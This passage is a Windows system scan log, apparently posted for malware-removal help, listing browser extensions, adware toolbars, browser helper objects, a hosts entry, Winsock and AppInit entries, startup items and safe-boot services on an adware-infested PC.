FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 27.0.1\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins
[2011/12/24 17:51:27 | 000,000,000 | ---D | M] (No name found) -- C:\Users\APPE-ATELIER\AppData\Roaming\mozilla\Extensions
[2014/02/23 10:49:55 | 000,000,000 | ---D | M] (No name found) -- C:\Users\APPE-ATELIER\AppData\Roaming\mozilla\Firefox\Profiles\m6k4uanf.default\extensions
[2014/01/23 02:00:04 | 000,270,391 | ---- | M] () (No name found) -- C:\Users\APPE-ATELIER\AppData\Roaming\mozilla\firefox\profiles\m6k4uanf.default\extensions\jid0-O6MIff3eO5dIGf5Tcv8RsJDKxrs@jetpack.xpi
[2011/11/07 10:16:43 | 000,246,802 | ---- | M] () (No name found) -- C:\Users\APPE-ATELIER\AppData\Roaming\mozilla\firefox\profiles\m6k4uanf.default\extensions\lazarus@interclue.com.xpi
[2014/02/21 05:26:24 | 000,008,114 | ---- | M] () (No name found) -- C:\Users\APPE-ATELIER\AppData\Roaming\mozilla\firefox\profiles\m6k4uanf.default\extensions\{42e50651-9669-456e-9081-d5a836274274}.xpi
[2011/12/30 19:54:46 | 000,002,650 | ---- | M] () -- C:\Users\APPE-ATELIER\AppData\Roaming\mozilla\firefox\profiles\m6k4uanf.default\searchplugins\bing.xml
[2014/02/22 16:13:40 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\mozilla firefox\browser\extensions
[2014/02/22 16:13:40 | 000,000,000 | ---D | M] (Default) -- C:\Program Files\mozilla firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
[2013/05/29 14:18:22 | 000,000,000 | ---D | M] (avast! WebRep) -- C:\PROGRAM FILES\ALWIL SOFTWARE\AVAST5\WEBREP\FF

[color=#E56717]========== Chrome ==========[/color]

CHR - default_search_provider: Web Search (Enabled)
CHR - default_search_provider: search_url = http://www.google.com
CHR - default_search_provider: suggest_url = ,
CHR - homepage: http://www.google.com
CHR - plugin: Error reading preferences file
CHR - Extension: Documents Google = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.0.0.6_0\
CHR - Extension: Documents Google = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.5_0\
CHR - Extension: Documents Google = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.5_1\
CHR - Extension: Google Drive = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.2_0\
CHR - Extension: Google Drive = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: Google Drive = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_1\
CHR - Extension: YouTube = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.5_0\
CHR - Extension: YouTube = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\
CHR - Extension: YouTube = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_1\
CHR - Extension: Recherche Google = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\
CHR - Extension: Recherche Google = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
CHR - Extension: Recherche Google = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_1\
CHR - Extension: No name found = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\ippenodjaoidmkkfdlmdhofiebnpjddb\1.0.0_0\
CHR - Extension: No name found = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\jlmgmnhapckhpikkcdfnbcfijmcnnfhe\1.6\
CHR - Extension: No name found = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\lcnnhcneegeeojhgpfijnlnocjdmlaon\1.0.0_0\
CHR - Extension: Google Wallet = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.4.10_0\
CHR - Extension: Google Wallet = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.0_0\
CHR - Extension: Google Wallet = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: MediaPlayerEnhance = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\okanipcmceoeemlbjnmnbdibhgpbllgc\13942.497.6251_0\crossrider
CHR - Extension: MediaPlayerEnhance = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\okanipcmceoeemlbjnmnbdibhgpbllgc\13942.497.6251_0\
CHR - Extension: No name found = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbcchiinnmikpddkmbaopjdcpacjedjl\2.2_0\
CHR - Extension: Gmail = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0\
CHR - Extension: Gmail = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\
CHR - Extension: Gmail = C:\Users\APPE-ATELIER\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_2\

O1 HOSTS File: ([2014/02/12 13:17:05 | 000,000,871 | ---- | M]) - C:\Windows\System32\drivers\etc\hosts
O1 - Hosts: 54.204.28.26 nikdaiaidiiiogaidkkekcmokcgcdeac
O2 - BHO: (Browser Companion Helper) - {00cbb66b-1d3b-46d3-9577-323a336acb50} - C:\Program Files\BrowserCompanion\jsloader.dll ( )
O2 - BHO: (Reverso Toolbar) - {09a07b02-f491-4b6b-bfc9-684a624f4f3b} - C:\Program Files\Reverso\prxtbReve.dll (Conduit Ltd.)
O2 - BHO: (MediaPlayerEnhance) - {11111111-1111-1111-1111-110411411150} - C:\Program Files\MediaPlayerEnhance\MediaPlayerEnhance-bho.dll (Feven)
O2 - BHO: (Plus-HD-5.7) - {11111111-1111-1111-1111-110411901182} - C:\Program Files\Plus-HD-5.7\Plus-HD-5.7-bho.dll (Plus HD)
O2 - BHO: (FindRight) - {2c774641-5504-46a8-b63f-6715ae3fe376} - C:\Program Files\FindRight\FindRightbho.dll (FindRight)
O2 - BHO: (Babylon toolbar helper) - {2EECD738-5844-4a99-B4B6-146BF802613B} - C:\Program Files\BabylonToolbar\BabylonToolbar\1.8.7.2\bh\BabylonToolbar.dll (Babylon BHO)
O2 - BHO: (UTubeAdBllOCk) - {35648F2D-501C-E2DA-A36F-69A4E1F43BD6} - C:\ProgramData\UTubeAdBllOCk\TjtBvk2VRI.dll ()
O2 - BHO: (IETabPage Class) - {3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C} - C:\Program Files\SupTab\SupTab.dll (Thinknice Co. 
Limited) O2 - BHO: (Avanquest FR Toolbar) - {6ec85fcf-87ad-41d7-ae1f-f116f8ad4848} - C:\Program Files\Avanquest_FR\prxtbAva2.dll (Conduit Ltd.) O2 - BHO: (SaveSense) - {71e129ff-6c2a-4984-818c-7e2c998b8d99} - C:\Users\APPE-ATELIER\AppData\Local\SaveSense\SaveSenseIE.dll (SaveSense) O2 - BHO: (avast! WebRep) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\Alwil Software\Avast5\aswWebRepIE.dll (AVAST Software) O2 - BHO: (ValueApps) - {93DBF2BB-A2B3-4683-A92E-57E60751F346} - C:\Program Files\Conduit\ValueApps\IE\ValueAppsLoader.dll (Conduit Ltd.) O2 - BHO: (Browser Companion Helper Verifier) - {963B125B-8B21-49A2-A3A8-E37092276531} - C:\Program Files\BrowserCompanion\updatebhoWin32.dll ( ) O2 - BHO: (HomeTab) - {9fdfb66c-713b-4201-83a6-5b78ae227b41} - C:\Program Files\HomeTab\IE\HomeTab.dll (Simply Tech LTD.) O2 - BHO: (DealPly) - {A6174F27-1FFF-E1D6-A93F-BA48AD5DD448} - C:\Program Files\DealPly\DealPlyIE.dll (DealPly Technologies Ltd) O2 - BHO: (MinibarBHO) - {AA74D58F-ACD0-450D-A85E-6C04B171C044} - C:\Program Files\Minibar\Minibar.dll (KangoExtensions) O2 - BHO: (Complitly) - {D27FC31C-6E3D-4305-8D53-ACDAEFA5F862} - C:\Users\APPE-ATELIER\AppData\Roaming\Complitly\Complitly.dll (SimplyGen) O2 - BHO: (Ask Toolbar) - {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files\Ask.com\GenericAskToolbar.dll (Ask) O2 - BHO: (Downloadd KeepEr) - {D8935116-0B6F-A5EA-C9F2-4CAAD181CBCF} - C:\Program Files\Downloadd KeepEr\InmSnqf.dll () O2 - BHO: (Hotspot Shield Class) - {F9E4A054-E9B1-4BC3-83A3-76A1AE736170} - C:\Program Files\Hotspot Shield\HssIE\HssIE.dll (AnchorFree Inc.) O2 - BHO: (no name) - {FD6D90C0-E6EE-4BC6-B9F7-9ED319698007} - No CLSID value found. O3 - HKLM\..\Toolbar: (Reverso Toolbar) - {09a07b02-f491-4b6b-bfc9-684a624f4f3b} - C:\Program Files\Reverso\prxtbReve.dll (Conduit Ltd.) O3 - HKLM\..\Toolbar: (Avanquest FR Toolbar) - {6ec85fcf-87ad-41d7-ae1f-f116f8ad4848} - C:\Program Files\Avanquest_FR\prxtbAva2.dll (Conduit Ltd.) 
O3 - HKLM\..\Toolbar: (avast! WebRep) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\Alwil Software\Avast5\aswWebRepIE.dll (AVAST Software)
O3 - HKLM\..\Toolbar: (Babylon Toolbar) - {98889811-442D-49dd-99D7-DC866BE87DBC} - C:\Program Files\BabylonToolbar\BabylonToolbar\1.8.7.2\BabylonToolbarTlbr.dll (Babylon Ltd.)
O3 - HKLM\..\Toolbar: (HomeTab) - {9fdfb66c-713b-4201-83a6-5b78ae227b41} - C:\Program Files\HomeTab\IE\HomeTab.dll (Simply Tech LTD.)
O3 - HKLM\..\Toolbar: (no name) - {ae07101b-46d4-4a98-af68-0333ea26e113} - No CLSID value found.
O3 - HKLM\..\Toolbar: (Ask Toolbar) - {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files\Ask.com\GenericAskToolbar.dll (Ask)
O3 - HKLM\..\Toolbar: (no name) - 10 - No CLSID value found.
O3 - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\Toolbar\WebBrowser: (Reverso Toolbar) - {09A07B02-F491-4B6B-BFC9-684A624F4F3B} - C:\Program Files\Reverso\prxtbReve.dll (Conduit Ltd.)
O3 - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\Toolbar\WebBrowser: (Avanquest FR Toolbar) - {6EC85FCF-87AD-41D7-AE1F-F116F8AD4848} - C:\Program Files\Avanquest_FR\prxtbAva2.dll (Conduit Ltd.)
O4 - HKLM..\Run: [avast] C:\Program Files\Alwil Software\Avast5\avastUI.exe (AVAST Software) O4 - HKLM..\RunOnce: [upfst_fr_83.exe] C:\Users\APPE-ATELIER\AppData\Local\fst_fr_83\upfst_fr_83.exe () O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (Microsoft Corporation) O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (Microsoft Corporation) O4 - HKLM..\RunOnceEx: [ContentMerger] c:\Program Files\Common Files\Roxio Shared\10.0\SharedCOM\ContentMerger10.exe (Sonic Solutions) O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3 O7 - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145 O9 - Extra Button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\Office12\REFIEBAR.DLL (Microsoft Corporation) O9 - Extra Button: Visit AppsHat.com - {AAA38851-3CFF-475F-B5E0-720D3645E4A5} - C:\Program Files\Minibar\Minibar.dll (KangoExtensions) O9 - Extra Button: ShopperReports - Compare product prices - {DB38E21A-0133-419d-92AD-ECDFD5244D6D} - Reg Error: Key error. File not found O9 - Extra Button: ShopperReports - Compare travel rates - {EB620C54-E229-4942-87CE-E717109FC8C6} - Reg Error: Key error. 
File not found O10 - Protocol_Catalog9\Catalog_Entries\000000000001 - C:\windows\System32\PCProtect.dll (Objectify Media Inc) O10 - Protocol_Catalog9\Catalog_Entries\000000000002 - C:\windows\System32\PCProtect.dll (Objectify Media Inc) O10 - Protocol_Catalog9\Catalog_Entries\000000000003 - C:\windows\System32\PCProtect.dll (Objectify Media Inc) O10 - Protocol_Catalog9\Catalog_Entries\000000000004 - C:\windows\System32\PCProtect.dll (Objectify Media Inc) O10 - Protocol_Catalog9\Catalog_Entries\000000000016 - C:\windows\System32\PCProtect.dll (Objectify Media Inc) O13 - gopher Prefix: missing O15 - HKLM\..Trusted Domains: //about.htm/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: //Exclude.htm/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: //FWEvent.htm/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: //LanguageSelection.htm/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: //Message.htm/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: //MyAgttryCmd.htm/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: //MyAgttryNag.htm/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: //MyNotification.htm/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: //NOCLessUpdate.htm/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: //quarantine.htm/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: //ScanNow.htm/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: //strings.vbs/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: //Template.htm/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: //Update.htm/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: //VirFound.htm/ ([]myui in Trusted sites) O15 - HKLM\..Trusted Domains: mcafee.com ([*] http in Trusted sites) O15 - HKLM\..Trusted Domains: mcafee.com ([*] https in Trusted sites) O15 - HKLM\..Trusted Domains: mcafeeasap.com ([betavscan] http in Trusted sites) O15 - HKLM\..Trusted Domains: mcafeeasap.com ([betavscan] https in Trusted sites) 
O15 - HKLM\..Trusted Domains: mcafeeasap.com ([vs] http in Trusted sites)
O15 - HKLM\..Trusted Domains: mcafeeasap.com ([vs] https in Trusted sites)
O15 - HKLM\..Trusted Domains: mcafeeasap.com ([www] http in Trusted sites)
O15 - HKLM\..Trusted Domains: mcafeeasap.com ([www] https in Trusted sites)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 212.27.40.240 212.27.40.241
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{763D3E3E-11A9-4A18-9B5A-A16568A3DAE0}: DhcpNameServer = 192.168.1.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{7AA3BAF7-26A5-4CEE-8D46-43B37427BA73}: DhcpNameServer = 212.27.40.240 212.27.40.241
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{7AA3BAF7-26A5-4CEE-8D46-43B37427BA73}: NameServer = 208.67.222.222,208.67.220.220
O18 - Protocol\Handler\base64 {5ACE96C0-C70A-4A4D-AF14-2E7B869345E1} - C:\Program Files\BrowserCompanion\tdataprotocol.dll (Blabbers Communications Ltd)
O18 - Protocol\Handler\chrome {5ACE96C0-C70A-4A4D-AF14-2E7B869345E1} - C:\Program Files\BrowserCompanion\tdataprotocol.dll (Blabbers Communications Ltd)
O18 - Protocol\Handler\prox {5ACE96C0-C70A-4A4D-AF14-2E7B869345E1} - C:\Program Files\BrowserCompanion\tdataprotocol.dll (Blabbers Communications Ltd)
O18 - Protocol\Filter\text/xml {807563E5-5146-11D5-A672-00B0D022E945} - C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE12\MSOXMLMF.DLL (Microsoft Corporation)
O20 - AppInit_DLLs: (c:\progra~2\winfil~1\winfil~1.dll) - c:\ProgramData\WinFilter\WinFilter.dll ()
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\windows\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\System32\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: VMApplet - (SystemPropertiesPerformance.exe) - C:\windows\System32\SystemPropertiesPerformance.exe (Microsoft Corporation)
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1 O34 - HKLM BootExecute: (autocheck autochk *) O35 - HKLM\..comfile [open] -- "%1" %* O35 - HKLM\..exefile [open] -- "%1" %* O37 - HKLM\...com [@ = comfile] -- "%1" %* O37 - HKLM\...exe [@ = exefile] -- "%1" %* O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3) O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2) O38 - SubSystems\\Windows: (ServerDll=sxssrv,4) NetSvcs: FastUserSwitchingCompatibility - File not found NetSvcs: Ias - C:\windows\System32\ias.dll (Microsoft Corporation) NetSvcs: Nla - File not found NetSvcs: Ntmssvc - File not found NetSvcs: NWCWorkstation - File not found NetSvcs: Nwsapagent - File not found NetSvcs: SRService - File not found NetSvcs: UxTuneUp - C:\Windows\System32\uxtuneup.dll (TuneUp Software GmbH) NetSvcs: WmdmPmSp - File not found NetSvcs: LogonHours - File not found NetSvcs: PCAudit - File not found NetSvcs: helpsvc - File not found NetSvcs: uploadmgr - File not found MsConfig - StartUpFolder: C:^Users^APPE-ATELIER^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^HP_CC38C23C-7824-4DBB-AC73-997CD0BBFEC7.lnk - - File not found MsConfig - StartUpFolder: C:^Users^APPE-ATELIER^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Lanceur.lnk - C:\PROGRA~1\MICROA~1\LAUNCH~1.EXE - (Micro Application) MsConfig - StartUpReg: [b]Adobe ARM[/b] - hkey= - key= - C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe (Adobe Systems Incorporated) MsConfig - StartUpReg: [b]Aimersoft Helper Compact.exe[/b] - hkey= - key= - C:\Program Files\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe (AimerSoft) MsConfig - StartUpReg: [b]Browser companion helper[/b] - hkey= - key= - C:\Program Files\BrowserCompanion\BCHelper.exe (Blabbers Communications LTD) MsConfig - StartUpReg: [b]File Helper[/b] - hkey= - key= - C:\Program Files\File Helper\File Helper.lnk () MsConfig - StartUpReg: [b]fst_fr_83[/b] - hkey= - key= - C:\Program 
Files\fst_fr_83\fst_fr_83.exe () MsConfig - StartUpReg: [b]HotKeysCmds[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]HPAdvisorDock[/b] - hkey= - key= - C:\Program Files\Hewlett-Packard\HP Advisor\Dock\HPAdvisorDock.exe () MsConfig - StartUpReg: [b]IAAnotif[/b] - hkey= - key= - C:\Program Files\Intel\Intel Matrix Storage Manager\iaanotif.exe (Intel Corporation) MsConfig - StartUpReg: [b]IgfxTray[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]IntelliPoint[/b] - hkey= - key= - c:\Program Files\Microsoft IntelliPoint\ipoint.exe (Microsoft Corporation) MsConfig - StartUpReg: [b]ISUSPM[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]LightScribe Control Panel[/b] - hkey= - key= - C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe (Hewlett-Packard Company) MsConfig - StartUpReg: [b]PDF Complete[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]Persistence[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]QLBController[/b] - hkey= - key= - C:\Program Files\Hewlett-Packard\HP HotKey Support\QLBController.exe (Hewlett-Packard Company) MsConfig - StartUpReg: [b]ShowBatteryBar[/b] - hkey= - key= - C:\Program Files\BatteryBar\ShowBatteryBar.exe () MsConfig - StartUpReg: [b]swg[/b] - hkey= - key= - C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe (Google Inc.) MsConfig - StartUpReg: [b]SynTPEnh[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]SysTrayApp[/b] - hkey= - key= - C:\Program Files\IDT\WDM\sttray.exe (IDT, Inc.) 
MsConfig - StartUpReg: [b]WirelessAssistant[/b] - hkey= - key= - C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe (Hewlett-Packard)
MsConfig - State: "services" - 2
MsConfig - State: "startup" - 2
SafeBootMin: AppMgmt - Service
SafeBootMin: Base - Driver Group
SafeBootMin: Boot Bus Extender - Driver Group
SafeBootMin: Boot file system - Driver Group
SafeBootMin: File system - Driver Group
SafeBootMin: Filter - Driver Group
SafeBootMin: HelpSvc - Service
SafeBootMin: NTDS - File not found
SafeBootMin: PCI Configuration - Driver Group
SafeBootMin: pcwatch.sys - C:\Windows\System32\drivers\pcwatch.sys ()
SafeBootMin: PNP Filter - Driver Group
SafeBootMin: Primary disk - Driver Group
SafeBootMin: sacsvr - Service
SafeBootMin: SCSI Class - Driver Group
SafeBootMin: System Bus Extender - Driver Group
SafeBootMin: vmms - Service
SafeBootMin: WinDefend - C:\Program Files\Windows Defender\mpsvc.dll (Microsoft Corporation)
SafeBootMin: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers
SafeBootMin: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive
SafeBootMin: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive
SafeBootMin: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller
SafeBootMin: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc
SafeBootMin: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard
SafeBootMin: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse
SafeBootMin: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters
SafeBootMin: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter
SafeBootMin: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System
SafeBootMin: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive
SafeBootMin: {533C5B84-EC70-11D2-9505-00C04F79DEAF} - Volume shadow copy
SafeBootMin: {6BDD1FC1-810F-11D0-BEC7-08002BE2092F} - IEEE 1394 Bus host controllers
SafeBootMin: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume
SafeBootMin: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices
SafeBootMin: {D48179BE-EC20-11D1-B6B8-00C04FA372A7} - SBP2 IEEE 1394 Devices
SafeBootMin: {D94EE5D8-D189-4994-83D2-F68D7D41B0E6} - SecurityDevices
SafeBootNet: AppMgmt - Service
SafeBootNet: Base - Driver Group
SafeBootNet: Boot Bus Extender - Driver Group
SafeBootNet: Boot file system - Driver Group
SafeBootNet: File system - Driver Group
SafeBootNet: Filter - Driver Group
SafeBootNet: HelpSvc - Service
SafeBootNet: Messenger - Service
SafeBootNet: NDIS Wrapper - Driver Group
SafeBootNet: NetBIOSGroup - Driver Group
SafeBootNet: NetDDEGroup - Driver Group
SafeBootNet: Network - Driver Group
SafeBootNet: NetworkProvider - Driver Group
SafeBootNet: NTDS - File not found
SafeBootNet: PCI Configuration - Driver Group
SafeBootNet: PCProtect - C:\Program Files\Web Protect\PCProtect.exe (Objectify Media Inc)
SafeBootNet: pcwatch.sys - C:\Windows\System32\drivers\pcwatch.sys ()
SafeBootNet: PNP Filter - Driver Group
SafeBootNet: PNP_TDI - Driver Group
SafeBootNet: Primary disk - Driver Group
SafeBootNet: rdsessmgr - Service
SafeBootNet: sacsvr - Service
SafeBootNet: SCSI Class - Driver Group
SafeBootNet: Streams Drivers - Driver Group
SafeBootNet: System Bus Extender - Driver Group
SafeBootNet: TDI - Driver Group
SafeBootNet: vmms - Service
SafeBootNet: WinDefend - C:\Program Files\Windows Defender\mpsvc.dll (Microsoft Corporation)
SafeBootNet: WudfUsbccidDriver - Driver
SafeBootNet: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers
SafeBootNet: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive
SafeBootNet: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive
SafeBootNet: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller
SafeBootNet: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc
SafeBootNet: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard
SafeBootNet: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse
SafeBootNet: {4D36E972-E325-11CE-BFC1-08002BE10318} - Net
SafeBootNet: {4D36E973-E325-11CE-BFC1-08002BE10318} - NetClient
SafeBootNet: {4D36E974-E325-11CE-BFC1-08002BE10318} - NetService SafeBootNet: {4D36E975-E325-11CE-BFC1-08002BE10318} - NetTrans SafeBootNet: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters SafeBootNet: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter SafeBootNet: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System SafeBootNet: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive SafeBootNet: {50DD5230-BA8A-11D1-BF5D-0000F805F530} - Smart card readers SafeBootNet: {533C5B84-EC70-11D2-9505-00C04F79DEAF} - Volume shadow copy SafeBootNet: {6BDD1FC1-810F-11D0-BEC7-08002BE2092F} - IEEE 1394 Bus host controllers SafeBootNet: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume SafeBootNet: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices SafeBootNet: {D48179BE-EC20-11D1-B6B8-00C04FA372A7} - SBP2 IEEE 1394 Devices SafeBootNet: {D94EE5D8-D189-4994-83D2-F68D7D41B0E6} - SecurityDevices ActiveX: {10880D85-AAD9-4558-ABDC-2AB1552D831F} - "C:\Program Files\Common Files\LightScribe\LSRunOnce.exe" ActiveX: {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 12.0 ActiveX: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll ActiveX: {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack ActiveX: {3C3901C5-3455-3E0A-A214-0B093A5070A6} - .NET Framework ActiveX: {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles%\Windows Mail\WinMail.exe" OCInstallUserConfigOE ActiveX: {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx ActiveX: {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help ActiveX: {4903D172-DCCB-392F-93A3-34CA9D47FE3D} - .NET Framework ActiveX: {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.6 ActiveX: {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools ActiveX: {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements ActiveX: {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows 
